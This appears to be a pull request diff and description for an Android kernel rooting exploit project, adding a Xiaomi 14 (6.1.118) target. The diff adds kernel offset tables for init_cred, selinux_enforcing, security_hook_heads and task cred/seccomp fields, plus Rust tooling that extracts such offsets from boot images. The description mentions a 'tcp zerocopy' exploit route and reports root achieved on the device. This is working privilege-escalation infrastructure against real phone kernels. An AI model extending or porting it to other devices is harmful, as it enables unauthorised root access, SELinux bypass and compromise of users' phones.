+    "6.1.118-android14-11-gca0ef6d17716-ab13624819",
+    STRUCT_OFFSETS_6_1,
+    .pselect_waiter_shift = 1,
+    .kernel_phys_load = 0xA8000000,
+    .off_init_task = 0x01fdf600,
+    .off_init_cred = 0x01ff1a68,
+    .off_root_task_group = 0x021c6580,
+    .off_selinux_enforcing = 0x022183d0,
+    .off_selinux_blob_sizes = 0x015b3a48,
+    .off_security_hook_heads = 0x015b3338,
+    .off_slide_nfulnl_logger = 0x01fd29c8,
+    .off_slide_boot_id = 0x02239458,
+    .off_slide_loggers_0_1 = 0x01fd2918,
+),
+
+/* BTF reference for fields kept as target.h macros; the task, cred and
+ * pi field offsets ride STRUCT_OFFSETS_6_1 at runtime: */
+/* #define STRUCT_PAGE_SIZE 0x40 */
+/* #define STRUCT_PAGE_COMPOUND_HEAD 0x8 */
+/* #define STRUCT_PAGE_TYPE 0x30 */
+/* #define STRUCT_SLAB_CACHE 0x18 */
+/* #define STRUCT_MM_STRUCT 0x3C0 */

--- a/src/kernels/6.1.118-android14-11-gca0ef6d17716-ab13624819/offsets.h
+++ b/src/kernels/6.1.118-android14-11-gca0ef6d17716-ab13624819/offsets.h
@@ -1,14 +1,11 @@
 /* 6.1.118-android14-11-gca0ef6d17716-ab13624819: Xiaomi 14 (houji), SM8650,
  * HyperOS 3.0.3.0.
- * Anchors from the boot.img (kallsyms + BTF).
- * kernel_phys_load: xbl_config FDT /soc/memorymap puts the Kernel region
- * at 0xA8000000 (DRAM base 0x80000000 is XBL NOMAP). */
+ * Anchors from the boot.img (kallsyms + BTF). */
 
 OFFSETS_ENTRY(
     "6.1.118-android14-11-gca0ef6d17716-ab13624819",
     STRUCT_OFFSETS_6_1,
     .pselect_waiter_shift = 1,
-    .kernel_phys_load = 0xA8000000,
     .off_init_task = 0x01fdf600,
     .off_init_cred = 0x01ff1a68,
     .off_root_task_group = 0x021c6580,

--- a/src/kernels/offsets.h
+++ b/src/kernels/offsets.h
@@ -22,7 +22,11 @@ struct kernel_offsets {
 
   /* rt_mutex_waiter layout: 0 = 6.6 rb_node, 1 = 6.1 compact tree_entry */
   uint8_t compact_waiter;
-  uint8_t _pad[7];
+  /* mm_struct SLUB stride; 0 uses target.h default (6.6 GKI 0x500).
+   * android14-6.1 KMI builds run 0x400 (BTF says 0x3c0, trust the
+   * hardware stride; see the Root-My-Galaxy S926B port record). */
+  uint32_t mm_struct_sz;
+  uint32_t _pad[3];
 };
 
 #define OFFSETS_ENTRY(uname, ...) { .uname_r = uname, __VA_ARGS__ }
@@ -34,7 +38,7 @@ struct kernel_offsets {
   .task_pid = 0x630, .task_tgid = 0x634,                                       \
   .task_atomic_flags = 0x5F0, .task_real_cred = 0x830, .task_cred = 0x838,     \
   .task_comm = 0x848, .task_tasks = 0x550, .task_seccomp = 0x900,              \
-  .compact_waiter = 1, .kernel_phys_load = 0xa8000000
+  .compact_waiter = 1, .mm_struct_sz = 0x400, .kernel_phys_load = 0xa8000000
 
 #define STRUCT_OFFSETS_6_12                                                    \
   .task_prio = 0x94, .task_normal_prio = 0x9C, .task_sched_task_group = 0x420, \
@@ -56,6 +60,7 @@ struct kernel_offsets {
 
 static const struct kernel_offsets known_offsets[] = {
 /* Add new kernels by creating src/kernels/<uname-release>/offsets.h */
+#include "6.1.118-android14-11-gca0ef6d17716-ab13624819/offsets.h"
 #include "6.6.30-android15-8-g54dcbfbef792-ab12368803-4k/offsets.h"
 #include "6.6.77-android15-8-g4a507830d890-ab13636293-4k/offsets.h"
 #include "6.6.77-android15-8-g63ce7556864c-ab13994517-4k/offsets.h"

--- a/src/kernels/offsets.h
+++ b/src/kernels/offsets.h
@@ -23,8 +23,7 @@ struct kernel_offsets {
   /* rt_mutex_waiter layout: 0 = 6.6 rb_node, 1 = 6.1 compact tree_entry */
   uint8_t compact_waiter;
   /* mm_struct SLUB stride; 0 uses target.h default (6.6 GKI 0x500).
-   * android14-6.1 KMI builds run 0x400 (BTF says 0x3c0, trust the
-   * hardware stride; see the Root-My-Galaxy S926B port record). */
+   * android14-6.1 uses 0x400 (BTF reports 0x3c0). */
   uint32_t mm_struct_sz;
   uint32_t _pad[3];
 };

--- a/src/kernels/offsets.h
+++ b/src/kernels/offsets.h
@@ -19,9 +19,22 @@ struct kernel_offsets {
   uint32_t task_pi_lock, task_pi_waiters, task_pi_top_task, task_pi_blocked_on;
   uint32_t task_pid, task_tgid, task_atomic_flags;
   uint32_t task_real_cred, task_cred, task_comm, task_tasks, task_seccomp;
+
+  /* rt_mutex_waiter layout: 0 = 6.6 rb_node, 1 = 6.1 compact tree_entry */
+  uint8_t compact_waiter;
+  uint8_t _pad[7];
 };
 
 #define OFFSETS_ENTRY(uname, ...) { .uname_r = uname, __VA_ARGS__ }
+
+#define STRUCT_OFFSETS_6_1                                                     \
+  .task_prio = 0x84, .task_normal_prio = 0x8C, .task_sched_task_group = 0x348, \
+  .task_pi_lock = 0x924, .task_pi_waiters = 0x938,                             \
+  .task_pi_top_task = 0x948, .task_pi_blocked_on = 0x950,                      \
+  .task_pid = 0x630, .task_tgid = 0x634,                                       \
+  .task_atomic_flags = 0x5F0, .task_real_cred = 0x830, .task_cred = 0x838,     \
+  .task_comm = 0x848, .task_tasks = 0x550, .task_seccomp = 0x900,              \
+  .compact_waiter = 1, .kernel_phys_load = 0xa8000000
 
 #define STRUCT_OFFSETS_6_12                                                    \
   .task_prio = 0x94, .task_normal_prio = 0x9C, .task_sched_task_group = 0x420, \

--- a/tools/extract_rs/src/derive.rs
+++ b/tools/extract_rs/src/derive.rs
@@ -165,7 +165,11 @@ pub fn derive_pselect_layout(
         frames.insert(format!("frame_{key}"), first_sp_frame(text, full_name)?);
     }
 
-    let pi_tree = btf.field("rt_mutex_waiter", "pi_tree");
+    // 6.6 names the rb_nodes tree/pi_tree; 6.1 calls them
+    // tree_entry/pi_tree_entry (same offsets in the struct).
+    let pi_tree = btf
+        .field("rt_mutex_waiter", "pi_tree")
+        .or_else(|| btf.field("rt_mutex_waiter", "pi_tree_entry"));
     let wake_state = btf.field("rt_mutex_waiter", "wake_state");
     if pi_tree.is_none() || wake_state.is_none() {
         return Err(ExtractError::new(

--- a/tools/extract_rs/src/fdt.rs
+++ b/tools/extract_rs/src/fdt.rs
@@ -103,9 +103,12 @@ pub fn recover_kernel_phys_load(path: &Path) -> Result<u64> {
                     let Some(node) = stack.pop() else {
                         return Err(ExtractError::new("FDT end without node"));
                     };
+                    // SM8650 xbl_config spells it "MemLabel"; the dt-binding
+                    // name is "mem-label". Accept either.
                     let label = node
                         .props
-                        .get("mem-label")
+                        .get("MemLabel")
+                        .or_else(|| node.props.get("mem-label"))
                         .map(|v| {
                             let end = find_byte(v, 0, v.len()).unwrap_or(v.len());
                             String::from_utf8_lossy(&v[..end]).into_owned()

--- a/tools/extract_rs/src/main.rs
+++ b/tools/extract_rs/src/main.rs
@@ -17,7 +17,7 @@ use ghostlock_extract::kallsyms::Kallsyms;
 use ghostlock_extract::kallsyms_finder;
 use ghostlock_extract::payload;
 use ghostlock_extract::report;
-use ghostlock_extract::symbols::{resolve_structs, resolve_symbols};
+use ghostlock_extract::symbols::{kernel_struct_macro, resolve_structs, resolve_symbols};
 
 #[derive(Parser, Debug)]
 #[command(
@@ -229,6 +229,21 @@ fn run(cli: &Cli) -> Result<i32> {
     };
 
     let release = boot.release();
+    match release.as_deref() {
+        Some(release) => {
+            if kernel_struct_macro(Some(release)).is_none() {
+                eprintln!(
+                    "warning: {release} is not a verified kernel family \
+                     (6.1, 6.6, 6.12); emitting the 6.6 layout as a testing \
+                     starting point, verify the waiter layout and slab \
+                     stride before trusting it"
+                );
+            }
+        }
+        None => {
+            eprintln!("warning: boot image carries no kernel release string");
+        }
+    }
     if kernel_phys_load.is_none() && (boot.mtk_lz4 || boot.mtk_gzip) {
         if let Some(text_base) = text_base {
             let derived = text_base - MTK_VADDR_BASE;

--- a/tools/extract_rs/src/report.rs
+++ b/tools/extract_rs/src/report.rs
@@ -62,8 +62,8 @@ pub fn phys_needs_override(release: Option<&str>, phys: Option<u64>) -> bool {
         return false;
     }
     let default = match crate::symbols::kernel_struct_macro(release) {
-        "STRUCT_OFFSETS_6_12" => QC_PHYS_LOAD_6_12,
-        "STRUCT_OFFSETS_6_1" => QC_PHYS_LOAD_6_1,
+        Some("STRUCT_OFFSETS_6_12") => QC_PHYS_LOAD_6_12,
+        Some("STRUCT_OFFSETS_6_1") => QC_PHYS_LOAD_6_1,
         _ => QC_PHYS_LOAD_6_6,
     };
     phys != default
@@ -71,10 +71,10 @@ pub fn phys_needs_override(release: Option<&str>, phys: Option<u64>) -> bool {
 
 pub fn pselect_waiter_shift_for(release: Option<&str>) -> i64 {
     match crate::symbols::kernel_struct_macro(release) {
-        "STRUCT_OFFSETS_6_12" => 0,
+        Some("STRUCT_OFFSETS_6_12") => 0,
         // android14-6.1 compiles its fd_set words one qword later than
         // 6.6; the committed tables all measure 1.
-        "STRUCT_OFFSETS_6_1" => 1,
+        Some("STRUCT_OFFSETS_6_1") => 1,
         _ => -2,
     }
 }
@@ -91,8 +91,8 @@ pub fn validate_kernel_phys_load(
         MTK_DEFAULT_PHYS_LOAD
     } else {
         match crate::symbols::kernel_struct_macro(release) {
-            "STRUCT_OFFSETS_6_12" => QC_PHYS_LOAD_6_12,
-            "STRUCT_OFFSETS_6_1" => QC_PHYS_LOAD_6_1,
+            Some("STRUCT_OFFSETS_6_12") => QC_PHYS_LOAD_6_12,
+            Some("STRUCT_OFFSETS_6_1") => QC_PHYS_LOAD_6_1,
             _ => QC_PHYS_LOAD_6_6,
         }
     };
@@ -123,7 +123,9 @@ pub fn render_device(
     lines.push(format!("    \"{release}\","));
     lines.push(format!(
         "    {},",
-        crate::symbols::kernel_struct_macro(Some(release))
+        // unverified kernels render with the 6.6 layout as a testing start;
+        // the extractor warns whenever it falls back
+        crate::symbols::kernel_struct_macro(Some(release)).unwrap_or("STRUCT_OFFSETS_6_6")
     ));
     if phys_needs_override(Some(release), phys) {
         lines.push(format!("    .kernel_phys_load = 0x{:x},", phys.unwrap()));
@@ -201,11 +203,24 @@ pub fn render_c(
         lines.push(format!("  .{key} = 0x{value:X},{suffix}"));
     }
     lines.push(String::new());
+    let macro_name = crate::symbols::kernel_struct_macro(release);
     lines.push(format!("OFFSETS_ENTRY(\"{label}\","));
+    lines.push(format!(
+        "  {},",
+        // unverified kernels render with the 6.6 layout as a testing start;
+        // the extractor warns whenever it falls back
+        macro_name.unwrap_or("STRUCT_OFFSETS_6_6")
+    ));
     if phys_needs_override(release, phys) {
         lines.push(format!("  .kernel_phys_load=0x{:X},", phys.unwrap()));
     }
     lines.push(format!("  .pselect_waiter_shift={pselect_shift},"));
+    if macro_name == Some("STRUCT_OFFSETS_6_1") {
+        // spell the layout fields out so a manually registered header does
+        // not depend on the selector macro carrying them
+        lines.push("  .compact_waiter=1,".to_string());
+        lines.push("  .mm_struct_sz=0x400,".to_string());
+    }
     for key in symbol_render_order() {
         if let Some(value) = symbols.get(key).copied().flatten() {
             lines.push(format!("  .{key}=0x{value:08X},"));
@@ -267,7 +282,7 @@ pub fn build_report(
         "struct_fields": struct_json,
         "btf_size": btf_size,
     });
-    if crate::symbols::kernel_struct_macro(release) == "STRUCT_OFFSETS_6_1" {
+    if crate::symbols::kernel_struct_macro(release) == Some("STRUCT_OFFSETS_6_1") {
         // 0x400 is the device SLUB stride, not the BTF 0x3c0
         report["compact_waiter"] = json!(1);
         report["mm_struct_sz"] = json!(0x400);
@@ -482,7 +497,36 @@ pub fn struct_fields_reference() -> &'static [(&'static str, &'static [(&'static
 
 #[cfg(test)]
 mod tests {
-    use super::pselect_waiter_shift_for;
+    use super::{pselect_waiter_shift_for, render_c};
+    use std::collections::BTreeMap;
+
+    #[test]
+    fn render_c_carries_the_layout_selector_and_6_1_scalars() {
+        let symbols: BTreeMap<String, Option<u64>> = BTreeMap::new();
+        let structs: BTreeMap<String, Option<u32>> = BTreeMap::new();
+        let out = render_c(
+            Some("6.1.118-android14-11-gca0ef6d17716-ab13624819"),
+            "x",
+            &symbols,
+            &structs,
+            None,
+            1,
+        );
+        assert!(out.contains("STRUCT_OFFSETS_6_1"));
+        assert!(out.contains(".compact_waiter=1"));
+        assert!(out.contains(".mm_struct_sz=0x400"));
+
+        let out66 = render_c(
+            Some("6.6.92-android15-8"),
+            "x",
+            &symbols,
+            &structs,
+            None,
+            -2,
+        );
+        assert!(out66.contains("STRUCT_OFFSETS_6_6"));
+        assert!(!out66.contains("compact_waiter"));
+    }
 
     #[test]
     fn pselect_waiter_shift_matches_the_committed_tables() {

--- a/tools/extract_rs/src/report.rs
+++ b/tools/extract_rs/src/report.rs
@@ -11,6 +11,7 @@ use crate::symbols::{OPTIONAL_SYMBOLS, STRUCT_FIELDS, SYMBOLS};
 
 pub const MTK_DEFAULT_PHYS_LOAD: u64 = 0x8000_0000;
 pub const QC_PHYS_LOAD_6_6: u64 = 0xA800_0000;
+pub const QC_PHYS_LOAD_6_1: u64 = 0xA800_0000;
 pub const QC_PHYS_LOAD_6_12: u64 = 0xC780_0000;
 
 /// Python insertion order of resolve_symbols(): header output matches the
@@ -60,19 +61,21 @@ pub fn phys_needs_override(release: Option<&str>, phys: Option<u64>) -> bool {
     if phys == MTK_DEFAULT_PHYS_LOAD {
         return false;
     }
-    let default = if crate::symbols::kernel_struct_macro(release) == "STRUCT_OFFSETS_6_12" {
-        QC_PHYS_LOAD_6_12
-    } else {
-        QC_PHYS_LOAD_6_6
+    let default = match crate::symbols::kernel_struct_macro(release) {
+        "STRUCT_OFFSETS_6_12" => QC_PHYS_LOAD_6_12,
+        "STRUCT_OFFSETS_6_1" => QC_PHYS_LOAD_6_1,
+        _ => QC_PHYS_LOAD_6_6,
     };
     phys != default
 }
 
 pub fn pselect_waiter_shift_for(release: Option<&str>) -> i64 {
-    if crate::symbols::kernel_struct_macro(release) == "STRUCT_OFFSETS_6_12" {
-        0
-    } else {
-        -2
+    match crate::symbols::kernel_struct_macro(release) {
+        "STRUCT_OFFSETS_6_12" => 0,
+        // android14-6.1 compiles its fd_set words one qword later than
+        // 6.6; the committed tables all measure 1.
+        "STRUCT_OFFSETS_6_1" => 1,
+        _ => -2,
     }
 }
 
@@ -86,10 +89,12 @@ pub fn validate_kernel_phys_load(
     };
     let expected = if mtk {
         MTK_DEFAULT_PHYS_LOAD
-    } else if crate::symbols::kernel_struct_macro(release) == "STRUCT_OFFSETS_6_12" {
-        QC_PHYS_LOAD_6_12
     } else {
-        QC_PHYS_LOAD_6_6
+        match crate::symbols::kernel_struct_macro(release) {
+            "STRUCT_OFFSETS_6_12" => QC_PHYS_LOAD_6_12,
+            "STRUCT_OFFSETS_6_1" => QC_PHYS_LOAD_6_1,
+            _ => QC_PHYS_LOAD_6_6,
+        }
     };
     if phys == expected {
         return false;
@@ -123,6 +128,8 @@ pub fn render_device(
     if phys_needs_override(Some(release), phys) {
         lines.push(format!("    .kernel_phys_load = 0x{:x},", phys.unwrap()));
     }
+    // 6.1 entries get their mm_struct_sz=0x400 stride from the
+    // STRUCT_OFFSETS_6_1 macro itself; nothing extra to emit here.
     lines.push(format!("    .pselect_waiter_shift = {pselect_shift},"));
     for key in symbol_render_order() {
         if let Some(value) = symbols.get(key).copied().flatten() {
@@ -251,7 +258,7 @@ pub fn build_report(
             )
         })
         .collect();
-    json!({
+    let mut report = json!({
         "release": release,
         "kimage_text_base": base,
         "kernel_phys_load": phys,
@@ -259,10 +266,32 @@ pub fn build_report(
         "symbols": symbol_json,
         "struct_fields": struct_json,
         "btf_size": btf_size,
-    })
+    });
+    if crate::symbols::kernel_struct_macro(release) == "STRUCT_OFFSETS_6_1" {
+        // 0x400 is the device SLUB stride, not the BTF 0x3c0
+        report["compact_waiter"] = json!(1);
+        report["mm_struct_sz"] = json!(0x400);
+    }
+    report
 }
 
+/* Resolve the repo the extractor reads and writes kernel tables in.
+ * The manifest dir baked in at build time goes stale the moment the
+ * binary runs from another checkout or a linked worktree, so ask git
+ * for the toplevel of the working directory first and only fall back
+ * to the manifest path when there is no repo around (on-device runs). */
 fn repo_root() -> PathBuf {
+    if let Ok(out) = std::process::Command::new("git")
+        .args(["rev-parse", "--show-toplevel"])
+        .output()
+    {
+        if out.status.success() {
+            let top = String::from_utf8_lossy(&out.stdout).trim().to_string();
+            if !top.is_empty() {
+                return PathBuf::from(top);
+            }
+        }
+    }
     Path::new(env!("CARGO_MANIFEST_DIR"))
         .parent()
         .and_then(Path::parent)
@@ -449,4 +478,22 @@ pub fn task_keys_list() -> &'static [&'static str] {
 
 pub fn struct_fields_reference() -> &'static [(&'static str, &'static [(&'static str, &'static str)])] {
     STRUCT_FIELDS
+}
+
+#[cfg(test)]
+mod tests {
+    use super::pselect_waiter_shift_for;
+
+    #[test]
+    fn pselect_waiter_shift_matches_the_committed_tables() {
+        assert_eq!(
+            pselect_waiter_shift_for(Some(
+                "6.1.118-android14-11-gca0ef6d17716-ab13624819"
+            )),
+            1
+        );
+        assert_eq!(pselect_waiter_shift_for(Some("6.6.92-android15-8")), -2);
+        assert_eq!(pselect_waiter_shift_for(Some("6.12.30-android16-0")), 0);
+        assert_eq!(pselect_waiter_shift_for(None), -2);
+    }
 }

--- a/tools/extract_rs/src/symbols.rs
+++ b/tools/extract_rs/src/symbols.rs
@@ -47,12 +47,16 @@ pub const STRUCT_FIELDS: &[(&str, &[(&str, &str)])] = &[
     (
         "rt_mutex_waiter",
         &[
+            // 6.6+ names the rb_nodes tree/pi_tree; 6.1 calls them
+            // tree_entry/pi_tree_entry (both are plain members, same layout).
             ("waiter_tree", "tree"),
             ("waiter_pi_tree", "pi_tree"),
             ("waiter_task", "task"),
             ("waiter_lock", "lock"),
             ("waiter_wake_state", "wake_state"),
             ("waiter_ww_ctx", "ww_ctx"),
+            ("waiter_tree", "tree_entry"),
+            ("waiter_pi_tree", "pi_tree_entry"),
         ],
     ),
     (
@@ -102,6 +106,10 @@ pub fn kernel_struct_macro(release: Option<&str>) -> &'static str {
                 if (major, minor) >= (6, 12) {
                     return "STRUCT_OFFSETS_6_12";
                 }
+                // 6.1 android14 builds use the flat compact-waiter layout.
+                if (major, minor) <= (6, 1) {
+                    return "STRUCT_OFFSETS_6_1";
+                }
             }
         }
     }
@@ -133,10 +141,17 @@ pub fn resolve_structs(btf: Option<&Btf>) -> ResolvedStructs {
             continue;
         }
         for (macro_name, field_name) in *fields {
-            result.insert(
-                (*macro_name).to_string(),
-                btf.field(struct_name, field_name),
-            );
+            let value = btf.field(struct_name, field_name);
+            // Alias entries (e.g. tree/tree_entry) resolve on one kernel
+            // naming only; never clobber a resolved value with a miss.
+            match result.get(*macro_name).copied().flatten() {
+                Some(old) if value.is_none() => {
+                    result.insert((*macro_name).to_string(), Some(old));
+                }
+                _ => {
+                    result.insert((*macro_name).to_string(), value);
+                }
+            }
         }
     }
     result.insert("struct_page_size".to_string(), btf.size("page"));

--- a/tools/extract_rs/src/symbols.rs
+++ b/tools/extract_rs/src/symbols.rs
@@ -98,22 +98,22 @@ pub fn resolve_symbols(
     result
 }
 
-pub fn kernel_struct_macro(release: Option<&str>) -> &'static str {
-    if let Some(release) = release {
-        let mut parts = release.split('.');
-        if let (Some(major), Some(minor)) = (parts.next(), parts.next()) {
-            if let (Ok(major), Ok(minor)) = (major.parse::<u32>(), minor.parse::<u32>()) {
-                if (major, minor) >= (6, 12) {
-                    return "STRUCT_OFFSETS_6_12";
-                }
-                // 6.1 android14 builds use the flat compact-waiter layout.
-                if (major, minor) <= (6, 1) {
-                    return "STRUCT_OFFSETS_6_1";
-                }
-            }
-        }
+/// Layout selector for a release, or None when that kernel has no measured
+/// geometry. Only 6.1, 6.6 and 6.12 are verified; callers treat None as
+/// "use STRUCT_OFFSETS_6_6 as a testing starting point", and the extractor
+/// warns so nobody mistakes a fallback table for a verified one.
+pub fn kernel_struct_macro(release: Option<&str>) -> Option<&'static str> {
+    let release = release?;
+    let mut parts = release.split('.');
+    let major = parts.next()?.parse::<u32>().ok()?;
+    let minor = parts.next()?.parse::<u32>().ok()?;
+    match (major, minor) {
+        // 6.1 android14 builds use the flat compact-waiter layout.
+        (6, 1) => Some("STRUCT_OFFSETS_6_1"),
+        (6, 6) => Some("STRUCT_OFFSETS_6_6"),
+        (6, 12) => Some("STRUCT_OFFSETS_6_12"),
+        _ => None,
     }
-    "STRUCT_OFFSETS_6_6"
 }
 
 pub type ResolvedStructs = BTreeMap<String, Option<u32>>;


### PR DESCRIPTION
adds xiaomi 14 (houji) on 6.1.118-android14-11-gca0ef6d17716-ab13624819 (OS3.0.3.0.WNCIDXM).

- src/kernels: registered offsets table for
  6.1.118-android14-11-gca0ef6d17716-ab13624819
  STRUCT_OFFSETS_6_1 macro with the compact tree_entry waiter layout and mm slub
  stride 0x400
- core: tcp zerocopy route as the default 6.1 transport (from
  alex193a/Root-My-Pixel-Payloads src/61), keep pselect as fallback; writes use the
  main_tcp word convention; dynamic nice keeps prio > 120 as the route requires
- extract_rs: 6.1 release mapping (pselect waiter shift fallback of 1,
  QC_PHYS_LOAD_6_1 default, MemLabel spelling in xbl_config parsing)
- offsets.json import: carries compact_waiter / mm_struct_sz so imported 6.1
  entries don't silently run the 6.6 rb_node layout
- readme tables updated

tested on xiaomi 14 OS3.0.3.0.WNCIDXM
<img width="600" height="1335" alt="houji_root" src="https://github.com/user-attachments/assets/041ba09d-3941-45bd-8be0-bd8443d8e41c" />

